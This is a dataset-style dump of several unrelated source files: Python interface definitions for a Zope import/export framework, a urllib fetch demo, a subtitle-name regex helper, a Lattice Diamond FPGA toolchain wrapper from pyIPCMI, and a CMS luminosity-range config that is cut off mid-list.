""" Return the last date an extension was imported.
o The result will be a string, formated as IS0.
"""
class IWriteLogger(Interface):
"""Write methods used by the python logging Logger.
"""
def debug(msg, *args, **kwargs):
"""Log 'msg % args' with severity 'DEBUG'.
"""
def info(msg, *args, **kwargs):
"""Log 'msg % args' with severity 'INFO'.
"""
def warning(msg, *args, **kwargs):
"""Log 'msg % args' with severity 'WARNING'.
"""
def error(msg, *args, **kwargs):
"""Log 'msg % args' with severity 'ERROR'.
"""
def exception(msg, *args):
"""Convenience method for logging an ERROR with exception information.
"""
def critical(msg, *args, **kwargs):
"""Log 'msg % args' with severity 'CRITICAL'.
"""
def log(level, msg, *args, **kwargs):
"""Log 'msg % args' with the integer severity 'level'.
"""
class INode(Interface):
"""Node im- and exporter.
"""
node = Text(description=u'Im- and export the object as a DOM node.')
class IBody(INode):
"""Body im- and exporter.
"""
body = Text(description=u'Im- and export the object as a file body.')
mime_type = TextLine(description=u'MIME type of the file body.')
name = TextLine(description=u'Enforce this name for the file.')
suffix = TextLine(description=u'Suffix for the file.')
class IFilesystemExporter(Interface):
""" Plugin interface for site structure export.
"""
def export(export_context, subdir, root=False):
""" Export our 'context' using the API of 'export_context'.
o 'export_context' must implement
Products.GenericSupport.interfaces.IExportContext.
o 'subdir', if passed, is the relative subdirectory containing our
context within the site.
o 'root', if true, indicates that the current context is the
"root" of an import (this may be used to adjust paths when
interacting with the context).
"""
def listExportableItems():
""" Return a sequence of the child items to be exported.
o Each item in the returned sequence will be a tuple,
(id, object, adapter) where adapter must implement
IFilesystemExporter.
"""
class IFilesystemImporter(Interface):
""" Plugin interface for site structure export.
"""
def import_(import_context, subdir, root=False):
""" Import our 'context' using the API of 'import_context'.
o 'import_context' must implement
Products.GenericSupport.interfaces.IImportContext.
o 'subdir', if passed, is the relative subdirectory containing our
context within the site.
o 'root', if true, indicates that the current context is the
"root" of an import (this may be used to adjust paths when
interacting with the context).
"""
class IContentFactory(Interface):
""" Adapter interface for factories specific to a container.
"""
def __call__(id):
""" Return a new instance, seated in the context under 'id'.
"""
class IContentFactoryName(Interface):
""" Adapter interface for finding the name of the ICF for an object.
"""
def __call__():
""" Return a string, suitable for looking up an IContentFactory.
o The string should allow finding a factory for our context's
container which would create an "empty" instance of the same
type as our context.
"""
class ICSVAware(Interface):
""" Interface for objects which dump / load 'text/comma-separated-values'.
"""
def getId():
""" Return the Zope id of the object.
"""
def as_csv():
""" Return a string representing the object as CSV.
"""
def put_csv(fd):
""" Parse CSV and update the object.
o 'fd' must be a file-like object whose 'read' method returns
CSV text parseable by the 'csv.reader'.
"""
class IINIAware(Interface):
""" Interface for objects which dump / load INI-format files..
"""
def getId():
""" Return the Zope id of the object.
"""
def as_ini():
""" Return a string representing the object as INI.
"""
def put_ini(stream_or_text):
""" Parse INI-formatted text and update the object.
o 'stream_or_text' must be either a string, or else a stream
directly parseable by ConfigParser.
"""
class IDAVAware(Interface):
    """ Interface for objects which handle their own FTP / DAV operations.
    """
    def getId():
        """ Return the Zope id of the object.
        """
    def manage_FTPget():
        """ Return a string representing the object as a file.
        """
    def PUT(REQUEST, RESPONSE):
        """ Parse file content and update the object.

        o 'REQUEST' will have a 'get' method, which will have the
          content object in its "BODY" key.  It will also have 'get_header'
          method, whose headers (e.g., "Content-Type") may affect the
          processing of the body.
        """
|
[
"[email protected]"
] | |
d7f3500c58054c8e787b5eb8b5ef526a6c1fb2a4
|
a43346f397f55edf1f946bae937ae8ae9e21d955
|
/vscode2/test_urllib.py
|
83d06e098858b90cd428290a2f783d30dd67a847
|
[] |
no_license
|
OSYouth/vscode2
|
130474906566a3e90e9a60f5575b68453b4420ca
|
385f3cc42b84abfdb958d23e56883450b73e5247
|
refs/heads/master
| 2021-10-19T11:22:26.210328 | 2019-02-20T15:19:35 | 2019-02-20T15:19:35 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 179 |
py
|
# Minimal demo: fetch a URL and print its HTTP status code and body length.
import urllib.request as urllib

url = "https://www.baidu.com"

print ('第一种方法')
# BUG FIX: the response object was never closed, leaking the underlying
# socket.  urlopen() results support the context-manager protocol, so use
# `with` to release the connection deterministically.
with urllib.urlopen(url) as response1:
    print (response1.getcode())
    print (len(response1.read()))
|
[
"[email protected]"
] | |
35ed390982090e723108fa49c6bc3eca2fac169b
|
ffeedf288d6aa5302abf1771e23c3090b52d7676
|
/filemapper/metadata/regex/regexsubtitleextension.py
|
ee29654357f444d8fda6bbadb7f510ddf6ff2567
|
[] |
no_license
|
AsiganTheSunk/python-multimedia-filemapper
|
f648577f610467abdb9e1ff43783fd1b8ec5b748
|
5daa07c51f3e85df48a0c336633ac150687fe24c
|
refs/heads/master
| 2022-07-07T10:12:43.066571 | 2017-11-02T01:02:20 | 2017-11-02T01:02:20 | 98,677,659 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,813 |
py
|
import re
from filemapper.utils.fileflags import FileFlags as fflags
class RegexSubtitleExtension():
    """Regex engine that detects subtitle-directory tokens in media file or
    directory names and reports them as the normalized name 'subs'."""

    def __init__(self):
        self.name = 'RegexSubtitleExtension'
        self.supported_fflags = []
        self.supported_season_fflags = []
        self.supported_subtitle_fflags = [fflags.SUBTITLE_DIRECTORY_FILM_FLAG,
                                          fflags.SUBTITLE_FILM_FLAG,
                                          fflags.SUBTITLE_DIRECTORY_SHOW_FLAG,
                                          fflags.SUBTITLE_SHOW_FLAG,
                                          fflags.SUBTITLE_DIRECTORY_ANIME_FLAG,
                                          fflags.SUBTITLE_ANIME_FLAG]

    def get_subtitles_directory(self, stream, debug=False):
        '''
        Retrieve the subtitle-directory token of a file or directory name.

        :param stream: the input string being parsed
        :param debug: print a trace of the match when True; default False
        :return: 'subs' when a subtitle token matched, '' otherwise
        '''
        # Raw string avoids the invalid-escape DeprecationWarning for '\!'.
        # NOTE(review): the lookahead '(?!=\!)' reproduces the original
        # pattern verbatim; it may have been meant as '(?!\!)' — confirm
        # intent before changing the regex itself.
        _subtitle_directory_patterns = [r'(sub\w{0,6}(?!=\!))']
        try:
            subtitle_directory = re.search(_subtitle_directory_patterns[0], stream, re.IGNORECASE).group(0)
        except AttributeError:
            # re.search() returned None (no match); report a blank field,
            # to be corrected later in ReEngine.
            return ''
        else:
            # Normalize whatever variant matched ('Subs', 'SUBTITLES', ...) to 'subs'.
            subtitle_directory = 'subs'
        if debug:
            # BUG FIX: the original wrote print('...').format(...), calling
            # .format() on print()'s return value (None), which raised
            # AttributeError every time debug=True.  The format call now
            # applies to the string before printing.
            print('{extension_engine}: {stream} :: {value}'.format(
                extension_engine=self.name,
                stream=stream,
                value=subtitle_directory))
        return subtitle_directory
|
[
"[email protected]"
] | |
31afddcb16282f0930e0128adb77023409f9431d
|
8581ebb9bd1a8cf5da5d9745a23995d0a2438998
|
/pyIPCMI/ToolChain/Lattice/Diamond.py
|
3fd18ebebbbc07edc6b52672237ba60cdef635a3
|
[
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
Paebbels/pyIPCMI
|
9ab01397d88299173732645bbbab949915ca48b9
|
0f91e26f989ca025c9380ff808d1e532614b9593
|
refs/heads/master
| 2021-06-13T21:43:00.022816 | 2019-10-13T02:48:37 | 2019-10-13T02:48:37 | 94,079,170 | 7 | 4 |
NOASSERTION
| 2021-04-29T20:58:29 | 2017-06-12T09:33:44 |
Python
|
UTF-8
|
Python
| false | false | 12,636 |
py
|
# EMACS settings: -*- tab-width: 2; indent-tabs-mode: t; python-indent-offset: 2 -*-
# vim: tabstop=2:shiftwidth=2:noexpandtab
# kate: tab-width 2; replace-tabs off; indent-width 2;
#
# ==============================================================================
# Authors: Patrick Lehmann
# Martin Zabel
#
# Python Class: Lattice Diamond specific classes
#
# License:
# ==============================================================================
# Copyright 2017-2018 Patrick Lehmann - Bötzingen, Germany
# Copyright 2007-2016 Technische Universität Dresden - Germany
# Chair of VLSI-Design, Diagnostics and Architecture
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
#
# load dependencies
import time
from pathlib import Path
from subprocess import check_output, CalledProcessError, STDOUT
from lib.Functions import Init
from pyIPCMI.Base.Exceptions import PlatformNotSupportedException
from pyIPCMI.Base.Logging import Severity, LogEntry
from pyIPCMI.Base.Executable import CommandLineArgumentList, ExecutableArgument, ShortTupleArgument, DryRunException
from pyIPCMI.Base.Project import File, FileTypes, VHDLVersion
from pyIPCMI.ToolChain import ToolMixIn, ConfigurationException, ToolConfiguration, OutputFilteredExecutable
from pyIPCMI.ToolChain.GNU import Bash
from pyIPCMI.ToolChain.Windows import Cmd
from pyIPCMI.ToolChain.Lattice import LatticeException
# Public API of this module; mirrored into __all__ below so that both the
# documentation tooling (__api__) and star-imports (__all__) agree.
__api__ = [
    'DiamondException',
    'Configuration',
    'Diamond',
    'Synth',
    'SynthesisArgumentFile',
    'MapFilter',
    'CompilerFilter'
]
__all__ = __api__
class DiamondException(LatticeException):
    """Raised for errors specific to the Lattice Diamond toolchain."""
    pass
class Configuration(ToolConfiguration):
    """Interactive configuration for a Lattice Diamond installation:
    detects the install, validates the reported version, and records the
    binary directories in the pyIPCMI configuration."""
    _vendor = "Lattice"                        #: The name of the tools vendor.
    _toolName = "Lattice Diamond"              #: The name of the tool.
    _section = "INSTALL.Lattice.Diamond"       #: The name of the configuration section. Pattern: ``INSTALL.Vendor.ToolName``.
    _multiVersionSupport = True                #: Lattice Diamond supports multiple versions installed on the same system.
    _template = {
        "Windows": {
            _section: {
                "Version": "3.8",
                "SectionName": ("%{PathWithRoot}#${Version}", None),
                "InstallationDirectory": ("${${SectionName}:InstallationDirectory}", "${INSTALL.Lattice:InstallationDirectory}/Diamond/${Version}_x64"),
                "BinaryDirectory": ("${${SectionName}:BinaryDirectory}", "${InstallationDirectory}/bin/nt64"),
                "BinaryDirectory2": ("${${SectionName}:BinaryDirectory2}", "${InstallationDirectory}/ispfpga/bin/nt64")
            }
        },
        "Linux": {
            _section: {
                "Version": "3.8",
                "SectionName": ("%{PathWithRoot}#${Version}", None),
                "InstallationDirectory": ("${${SectionName}:InstallationDirectory}", "${INSTALL.Lattice:InstallationDirectory}/diamond/${Version}_x64"),
                "BinaryDirectory": ("${${SectionName}:BinaryDirectory}", "${InstallationDirectory}/bin/lin64"),
                "BinaryDirectory2": ("${${SectionName}:BinaryDirectory2}", "${InstallationDirectory}/ispfpga/bin/lin64")
            }
        }
    }  #: The template for the configuration sections represented as nested dictionaries.

    def CheckDependency(self):
        """Check if general Lattice support is configured in pyIPCMI."""
        return (len(self._host.Config['INSTALL.Lattice']) != 0)

    def ConfigureForAll(self):
        """Ask the user about the Diamond installation and populate the
        configuration section (version, installation dir, binary dirs)."""
        try:
            if (not self._AskInstalled("Is Lattice Diamond installed on your system?")):
                self.ClearSection()
            else:
                # Configure Diamond version
                version = self._ConfigureVersion()
                if self._multiVersionSupport:
                    self.PrepareVersionedSections()
                    sectionName = self._host.Config[self._section]['SectionName']
                    self._host.Config[sectionName]['Version'] = version
                self._ConfigureInstallationDirectory()
                binPath = self._ConfigureBinaryDirectory()
                self.__CheckDiamondVersion(binPath, version)
                self._host.LogNormal("{DARK_GREEN}Lattice Diamond is now configured.{NOCOLOR}".format(**Init.Foreground), indent=1)
        except ConfigurationException:
            # Leave no half-written section behind before re-raising.
            self.ClearSection()
            raise

    def __CheckDiamondVersion(self, binPath, version):
        """Run the Diamond Tcl shell (pnmainc) and verify its output mentions
        the expected version; raises ConfigurationException otherwise."""
        if (self._host.Platform == "Windows"): tclShellPath = binPath / "pnmainc.exe"
        else: tclShellPath = binPath / "pnmainc"
        if not tclShellPath.exists():
            raise ConfigurationException("Executable '{0!s}' not found.".format(tclShellPath)) from FileNotFoundError(
                str(tclShellPath))
        try:
            # "???" is not a valid command; presumably it makes pnmainc print
            # its banner (which contains the version) and exit — TODO confirm.
            output = check_output([str(tclShellPath), "???"], stderr=STDOUT, universal_newlines=True)
        except CalledProcessError as ex:
            output = ex.output
        for line in output.split('\n'):
            if str(version) in line:
                break
        else:
            # for/else: no output line mentioned the expected version string.
            raise ConfigurationException("Diamond version mismatch. Expected version {0}.".format(version))
        self._host.Config[self._section]['Version'] = version

    def _ConfigureBinaryDirectory(self):
        """Updates section with value from _template and returns directory as Path object."""
        binPath = super()._ConfigureBinaryDirectory()
        # unresolved = self._template[self._host.Platform][self._section]['BinaryDirectory2']
        # self._host.Config[self._section]['BinaryDirectory2'] = unresolved # create entry
        defaultPath = Path(self._host.Config[self._section]['BinaryDirectory2']) # resolve entry
        binPath2 = defaultPath # may be more complex in the future
        if (not binPath2.exists()):
            raise ConfigurationException("{0!s} 2nd binary directory '{1!s}' does not exist.".format(self, binPath2)) \
                from NotADirectoryError(str(binPath2))
        return binPath
class Diamond(ToolMixIn):
    """Entry point for the Diamond toolchain: prepares the shell environment
    and hands out tool wrappers (currently only the LSE synthesizer)."""
    def PreparseEnvironment(self, installationDirectory):
        """Capture the environment variables Diamond tools need, per platform."""
        if (self._platform == "Linux"):
            cmd = Bash(self._platform, self._dryrun, logger=self._logger)
            settingsFile = installationDirectory / "bin/lin64/diamond_env"
            # Source Diamond's own environment script; it requires 'bindir'
            # to be preset before sourcing.
            self._environment = cmd.GetEnvironment(settingsFile, variables="bindir={0!s}/bin/lin64; ".format(installationDirectory))
        elif (self._platform == "Windows"):
            cmd = Cmd(self._platform, self._dryrun, logger=self._logger)
            self._environment = cmd.GetEnvironment()
            # Variables Diamond's Windows tools expect instead of a sourced script.
            self._environment.Variables['LSC_INI_PATH'] = ""
            self._environment.Variables['LSC_DIAMOND'] = "true"
            self._environment.Variables['FOUNDRY'] = str(installationDirectory / "ispFPGA")
            self._environment.Variables['TCL_LIBRARY'] = str(installationDirectory / "tcltk\\lib\\tcl8.5")

    def GetSynthesizer(self):
        """Return a Synth wrapper bound to this toolchain instance."""
        return Synth(self)
class Synth(OutputFilteredExecutable, ToolMixIn):
    """Wrapper for the Lattice Synthesis Engine (LSE) 'synthesis' executable."""
    def __init__(self, toolchain : ToolMixIn):
        ToolMixIn.__init__(
            self, toolchain._platform, toolchain._dryrun, toolchain._binaryDirectoryPath, toolchain._version,
            toolchain._logger)
        if (self._platform == "Windows"): executablePath = self._binaryDirectoryPath / "synthesis.exe"
        elif (self._platform == "Linux"): executablePath = self._binaryDirectoryPath / "synthesis"
        else: raise PlatformNotSupportedException(self._platform)
        super().__init__(self._platform, self._dryrun, executablePath, environment=toolchain._environment, logger=self._logger)
        self.Parameters[self.Executable] = executablePath

    class Executable(metaclass=ExecutableArgument):
        # Argument slot holding the path of the executable itself.
        pass

    class SwitchProjectFile(metaclass=ShortTupleArgument):
        # "-f <file>": the synthesis project/argument file to run.
        _name = "f"
        _value = None

    # Ordered list of command-line arguments for the LSE invocation.
    Parameters = CommandLineArgumentList(
        Executable,
        SwitchProjectFile
    )

    @staticmethod
    def GetLogFileReader(logFile):
        """Yield the lines of *logFile* (without trailing newline), polling
        until the file exists."""
        while True:
            if logFile.exists(): break
            time.sleep(5) # FIXME: implement a 'tail -f' functionality
        with logFile.open('r') as logFileHandle:
            for line in logFileHandle:
                yield line[:-1]

    def Compile(self, logFile):
        """Launch LSE with the configured parameters and relay its filtered
        output to the logger, tracking warning/error state.

        NOTE(review): the *logFile* parameter is not used in this body —
        confirm whether GetLogFileReader was meant to be wired in here.
        """
        parameterList = self.Parameters.ToArgumentList()
        self.LogVerbose("command: {0}".format(" ".join(parameterList)))
        if (self._dryrun):
            self.LogDryRun("Start process: {0}".format(" ".join(parameterList)))
            return
        try:
            self.StartProcess(parameterList)
        except Exception as ex:
            raise LatticeException("Failed to launch LSE.") from ex
        self._hasOutput = False
        self._hasWarnings = False
        self._hasErrors = False
        try:
            iterator = iter(CompilerFilter(self.GetReader()))
            line = next(iterator)
            # First line arrived: emit a header and ruler around the tool output.
            self._hasOutput = True
            self.LogNormal(" LSE messages for '{0}'".format(self.Parameters[self.SwitchProjectFile]))
            self.LogNormal(" " + ("-" * (78 - self.Logger.BaseIndent*2)))
            while True:
                # Accumulate severity flags; loop ends via StopIteration.
                self._hasWarnings |= (line.Severity is Severity.Warning)
                self._hasErrors |= (line.Severity is Severity.Error)
                line.IndentBy(self.Logger.BaseIndent + 1)
                self.Log(line)
                line = next(iterator)
        except DryRunException:
            pass
        except StopIteration:
            pass
        finally:
            if self._hasOutput:
                # Close the ruler opened above.
                self.LogNormal(" " + ("-" * (78 - self.Logger.BaseIndent*2)))
class SynthesisArgumentFile(File):
    """Builds and serializes the LSE synthesis argument file: device options,
    VHDL version, log file, HDL parameters, and the project's source list."""
    def __init__(self, file):
        super().__init__(file)
        self._architecture = None     # -a: device architecture/family
        self._device = None           # -d: device name
        self._speedGrade = None       # -s: speed grade
        self._package = None          # -t: package
        self._topLevel = None         # -top: top-level entity name
        # NOTE(review): 'Logfile' is a public attribute while all siblings use
        # a leading underscore — looks inconsistent; confirm before renaming.
        self.Logfile = None           # -logfile: optional log file path
        self._vhdlVersion = VHDLVersion.Any
        self._hdlParams = {}          # -hdl_param key/value pairs

    @property
    def Architecture(self):
        return self._architecture

    @Architecture.setter
    def Architecture(self, value):
        self._architecture = value

    @property
    def Device(self):
        return self._device

    @Device.setter
    def Device(self, value):
        self._device = value

    @property
    def SpeedGrade(self):
        return self._speedGrade

    @SpeedGrade.setter
    def SpeedGrade(self, value):
        self._speedGrade = value

    @property
    def Package(self):
        return self._package

    @Package.setter
    def Package(self, value):
        self._package = value

    @property
    def TopLevel(self):
        return self._topLevel

    @TopLevel.setter
    def TopLevel(self, value):
        self._topLevel = value

    @property
    def LogFile(self):
        return self.Logfile

    @LogFile.setter
    def LogFile(self, value):
        self.Logfile = value

    @property
    def VHDLVersion(self):
        return self._vhdlVersion

    @VHDLVersion.setter
    def VHDLVersion(self, value):
        self._vhdlVersion = value

    @property
    def HDLParams(self):
        # Read-only view; mutate the returned dict to add -hdl_param entries.
        return self._hdlParams

    def Write(self, project):
        """Serialize all options plus the project's VHDL sources into the
        argument file; raises DiamondException for any missing mandatory option."""
        if (self._file is None): raise DiamondException("No file path for SynthesisArgumentFile provided.")
        buffer = ""
        if (self._architecture is None): raise DiamondException("Argument 'Architecture' (-a) is not set.")
        buffer += "-a {0}\n".format(self._architecture)
        if (self._device is None): raise DiamondException("Argument 'Device' (-d) is not set.")
        buffer += "-d {0}\n".format(self._device)
        if (self._speedGrade is None): raise DiamondException("Argument 'SpeedGrade' (-s) is not set.")
        buffer += "-s {0}\n".format(self._speedGrade)
        if (self._package is None): raise DiamondException("Argument 'Package' (-t) is not set.")
        buffer += "-t {0}\n".format(self._package)
        if (self._topLevel is None): raise DiamondException("Argument 'TopLevel' (-top) is not set.")
        buffer += "-top {0}\n".format(self._topLevel)
        if (self._vhdlVersion is VHDLVersion.VHDL2008):
            buffer += "-vh2008\n"
        if (self.Logfile is not None):
            buffer += "-logfile {0}\n".format(self.Logfile)
        for keyValuePair in self._hdlParams.items():
            buffer += "-hdl_param {0} {1}\n".format(*keyValuePair)
        for file in project.Files(fileType=FileTypes.VHDLSourceFile):
            # Each source is emitted as a "-lib <library>" / "-vhd <file>" pair.
            buffer += "-lib {library}\n-vhd {file}\n".format(file=file.Path.as_posix(), library=file.LibraryName)
        with self._file.open('w') as fileHandle:
            fileHandle.write(buffer)
def MapFilter(gen):
    """Wrap every raw map-report line from *gen* in a Severity.Normal LogEntry."""
    yield from (LogEntry(raw_line, Severity.Normal) for raw_line in gen)
def CompilerFilter(gen):
    """Classify raw LSE output lines into LogEntry objects by message prefix.

    Lines starting with "ERROR ", "WARNING " or "INFO " get the matching
    severity; everything else is Severity.Normal.
    """
    prefix_severities = (
        ("ERROR ", Severity.Error),
        ("WARNING ", Severity.Warning),
        ("INFO ", Severity.Info),
    )
    for raw_line in gen:
        for prefix, severity in prefix_severities:
            if raw_line.startswith(prefix):
                yield LogEntry(raw_line, severity)
                break
        else:
            yield LogEntry(raw_line, Severity.Normal)
|
[
"[email protected]"
] | |
87359040a44cb331edcde6eadc795cc5893b7acf
|
81539aba88c22cf75bd2e14f5e0e92f2bf54e962
|
/DarkMatterMap2017/TTbarDMJets_Inclusive_scalar_LO_TuneCP5_13TeV_madgraph_mcatnlo_pythia8/TTbarDMJets_Inclusive_scalar_LO_Mchi-1_Mphi-50_TuneCP5_13TeV-madgraph-mcatnlo-pythia8/TTbarDMJets_Inclusive_scalar_LO_TuneCP5_13TeV_madgraph_mcatnlo_pythia8_230000_9_cff.py
|
e6759e810046c4bd042df921f1964599a39baf13
|
[] |
no_license
|
nistefan/RandomizedParametersSeparator
|
ad35b48b95e9745814c0bf9d8d8b6eb8aa479177
|
66a0e291b59113c6b5301768f1c10e36cf23d3c3
|
refs/heads/master
| 2021-01-03T00:41:17.415005 | 2020-02-19T13:30:54 | 2020-02-19T13:30:54 | 239,838,928 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 10,331 |
py
|
import FWCore.ParameterSet.Config as cms
# -1 means: process every event in the input files.
maxEvents = cms.untracked.PSet( input = cms.untracked.int32(-1) )
# Input file list; populated further down via readFiles.extend(...).
readFiles = cms.untracked.vstring()
source = cms.Source ("PoolSource",fileNames = readFiles, lumisToProcess = cms.untracked.VLuminosityBlockRange(*('1:21184', '1:20120', '1:21020', '1:21278', '1:21582', '1:22183', '1:20507', '1:20669', '1:21156', '1:21312', '1:21392', '1:85835', '1:85963', '1:85997', '1:24550', '1:27052', '1:49576', '1:56170', '1:60155', '1:75247', '1:76110', '1:69385', '1:69761', '1:69993', '1:54880', '1:57691', '1:62191', '1:62227', '1:62531', '1:62663', '1:62801', '1:55051', '1:55568', '1:67417', '1:67649', '1:67914', '1:55269', '1:67492', '1:67564', '1:98553', '1:98286', '1:98417', '1:98667', '1:49015', '1:54106', '1:56364', '1:59905', '1:61367', '1:61451', '1:61468', '1:61505', '1:61506', '1:49894', '1:50707', '1:51881', '1:52422', '1:57246', '1:61058', '1:78464', '1:78854', '1:57044', '1:62431', '1:63407', '1:76632', '1:68848', '1:72285', '1:74745', '1:75643', '1:77807', '1:75844', '1:78096', '1:80030', '1:81613', '1:81707', '1:95607', '1:95648', '1:97195', '1:97668', '1:99124', '1:99174', '1:99220', '1:96854', '1:98898', '1:101504', '1:97204', '1:97277', '1:97585', '1:98536', '1:98761', '1:99068', '1:99295', '1:99457', '1:99711', '1:100294', '1:101094', '1:101679', '1:100621', '1:23165', '1:27251', '1:24512', '1:28044', '1:28436', '1:31627', '1:34004', '1:34016', '1:35517', '1:35533', '1:35727', '1:35206', '1:35491', '1:36151', '1:36365', '1:39156', '1:39584', '1:39653', '1:39797', '1:46146', '1:39436', '1:55233', '1:55854', '1:62436', '1:64121', '1:64860', '1:67476', '1:67873', '1:68332', '1:69237', '1:55558', '1:55832', '1:55863', '1:64318', '1:64795', '1:67004', '1:67771', '1:68662', '1:68676', '1:69057', '1:56323', '1:63488', '1:50387', '1:54967', '1:54976', '1:59659', '1:59983', '1:60644', '1:61694', '1:63105', '1:63255', '1:63418', '1:59286', '1:60858', '1:61283', '1:61887', '1:63402', '1:16385', '1:16603', '1:17835', '1:18341', '1:18818', '1:22765', '1:22959', '1:6813', '1:6852', '1:7528', '1:8680', '1:9199', '1:9508', '1:9748', '1:10213', '1:14580', '1:14829', 
'1:15121', '1:13320', '1:24763', '1:27477', '1:30006', '1:30109', '1:37012', '1:39238', '1:39295', '1:40391', '1:40865', '1:46504', '1:46610', '1:46645', '1:46793', '1:28189', '1:30612', '1:35933', '1:39839', '1:39894', '1:46035', '1:46392', '1:49861', '1:51430', '1:51463', '1:23868', '1:57018', '1:59208', '1:59762', '1:23400', '1:30332', '1:30753', '1:50758', '1:51529', '1:53025', '1:57045', '1:58145', '1:28443', '1:31856', '1:32484', '1:34368', '1:34437', '1:34536', '1:35112', '1:35264', '1:23347', '1:27136', '1:28005', '1:28199', '1:28224', '1:28288', '1:28385', '1:28504', '1:28622', '1:28758', '1:59112', '1:59232', '1:59236', '1:59565', '1:59585', '1:59940', '1:60360', '1:60397', '1:60613', '1:60675', '1:60934', '1:60992', '1:61068', '1:61109', '1:63375', '1:80899', '1:72212', '1:72782', '1:70147', '1:70695', '1:71205', '1:71244', '1:72197', '1:72249', '1:74777', '1:55594', '1:55614', '1:55622', '1:55631', '1:55677', '1:55707', '1:55749', '1:55767', '1:55775', '1:55781', '1:55784', '1:77296', '1:77602', '1:77640', '1:74157', '1:74158', '1:74194', '1:74237', '1:74282', '1:74287', '1:74328', '1:74351', '1:74380', '1:74405', '1:74407', '1:74422', '1:74439', '1:74453', '1:74418', '1:74444', '1:74450', '1:74499', '1:74536', '1:74560', '1:74569', '1:74596', '1:75788', '1:95454', '1:95472', '1:95696', '1:95603', '1:95639', '1:95652', '1:95654', '1:95666', '1:95694', '1:95814', '1:95815', '1:95834', '1:95896', '1:95900', '1:97330', '1:97543', '1:97557', '1:97568', '1:97606', '1:97607', '1:97613', '1:97664', '1:61160', '1:60670', '1:60754', '1:60763', '1:60784', '1:60859', '1:60867', '1:61265', '1:61355', '1:61384', '1:61499', '1:61572', '1:75277', '1:75328', '1:62455', '1:62954', '1:63854', '1:64050', '1:64116', '1:64178', '1:64197', '1:64220', '1:64245', '1:64252', '1:64255', '1:64331', '1:64358', '1:67205', '1:67213', '1:67271', '1:67354', '1:67367', '1:67381', '1:71762', '1:71819', '1:72192', '1:72202', '1:72318', '1:72333', '1:72334', '1:73243', '1:73252', 
'1:73274', '1:73316', '1:73317', '1:73338', '1:74248', '1:96893', '1:98397', '1:99165', '1:99809', '1:100790', '1:96932', '1:99503', '1:101946', '1:20496', '1:33758', '1:36960', '1:25057', '1:32922', '1:33619', '1:36626', '1:38508', '1:59819', '1:96346', '1:96483', '1:102082', '1:102219', '1:102259', '1:102501', '1:96750', '1:98471', '1:98606', '1:99283', '1:99340', '1:99578', '1:99734', '1:100120', '1:100201', '1:100328', '1:101624', '1:101986', '1:80622', '1:81515', '1:86754', '1:89637', '1:91321', '1:87255', '1:90124', '1:95550', '1:97900', '1:88926', '1:89400', '1:91483', '1:79838', '1:86503', '1:95699', '1:763', '1:23253', '1:23448', '1:23455', '1:23472', '1:23889', '1:24435', '1:27092', '1:30299', '1:30364', '1:30397', '1:30899', '1:30931', '1:16401', '1:49802', '1:49864', '1:49904', '1:49916', '1:49934', '1:51013', '1:49793', '1:49821', '1:49829', '1:49837', '1:49884', '1:49907', '1:49956', '1:49961', '1:49978', '1:50080', '1:50100', '1:50107', '1:50167', '1:62576', '1:62676', '1:62726', '1:62471', '1:62657', '1:62668', '1:62740', '1:80869', '1:80985', '1:85057', '1:85170', '1:85228', '1:85239', '1:85333', '1:85361', '1:85294', '1:85330', '1:85332', '1:85334', '1:85464', '1:85489', '1:85499', '1:85636', '1:85557', '1:85561', '1:85881', '1:85914', '1:85922', '1:85988', '1:86065', '1:86103', '1:86120', '1:86154', '1:86179', '1:86259', '1:86306', '1:86349', '1:27773', '1:27837', '1:27934', '1:27935', '1:27975', '1:28024', '1:28058', '1:28065', '1:30112', '1:30115', '1:39648', '1:39726', '1:39857', '1:39865', '1:40350', '1:40432', '1:40497', '1:40796', '1:40826', '1:80920', '1:72753', '1:73489', '1:91891', '1:64550', '1:67895', '1:67938', '1:73101', '1:73113', '1:73118', '1:73147', '1:73161', '1:73237', '1:73244', '1:73280', '1:94733', '1:95759', '1:74979', '1:75383', '1:75972', '1:76349', '1:76377', '1:76382', '1:76401', '1:76544', '1:76841', '1:76846', '1:76472', '1:76549', '1:76562', '1:86564', '1:79693', '1:85471', '1:86438', '1:70568', '1:79207', '1:89442', 
'1:73309', '1:74032', '1:74329', '1:74332', '1:74340', '1:74816', '1:74967', '1:75774', '1:78030', '1:78140', '1:78320', '1:78358', '1:78360', '1:78378', '1:78388', '1:77569', '1:77726', '1:77740', '1:77829', '1:77849', '1:77960', '1:79155', '1:79165', '1:79187', '1:79196', '1:79220', '1:79301', '1:79309', '1:79324', '1:79349', '1:79374', '1:79400', '1:79448', '1:79462', '1:79512', '1:79520', '1:79521', '1:79567', '1:79618', '1:79630', '1:79650', '1:79491', '1:79501', '1:80117', '1:90625', '1:97803', '1:98322', '1:75149', '1:75254', '1:76631', '1:76688', '1:76706', '1:76648', '1:86572', '1:77544', '1:77675', '1:77692', '1:77779', '1:77921', '1:78503', '1:78505', '1:78524', '1:78554', '1:78661', '1:78668', '1:78696', '1:78842', '1:78962', '1:79237', '1:88129', '1:88622', '1:88636', '1:88640', '1:90113', '1:90118', '1:86140', '1:86446', '1:86495', '1:86496', '1:86515', '1:86578', '1:86599', '1:86644', '1:86679', '1:86731', '1:86690', '1:86691', '1:86709', '1:86747', '1:86816', '1:86825', '1:86865', '1:86936', '1:87230', '1:2557', '1:2681', '1:2804', '1:2664', '1:2793', '1:2940', '1:2992', '1:3008', '1:3052', '1:3211', '1:3227', '1:2907', '1:2964', '1:5766', '1:5769', '1:5842', '1:5897', '1:5910', '1:16373', '1:16399', '1:16432', '1:16480', '1:16487', '1:16534', '1:16585', '1:16656', '1:16746', '1:16772', '1:16843', '1:16845', '1:49339', '1:50015', '1:50348', '1:50468', '1:50671', '1:50793', '1:50979', '1:51918', '1:52026', '1:19115', '1:19658', '1:19744', '1:20683', '1:21026', '1:21058', '1:18294', '1:18488', '1:18507', '1:20157', '1:20164', '1:20222', '1:20245', '1:61991', '1:52479', '1:53377', '1:53427', '1:54001', '1:54010', 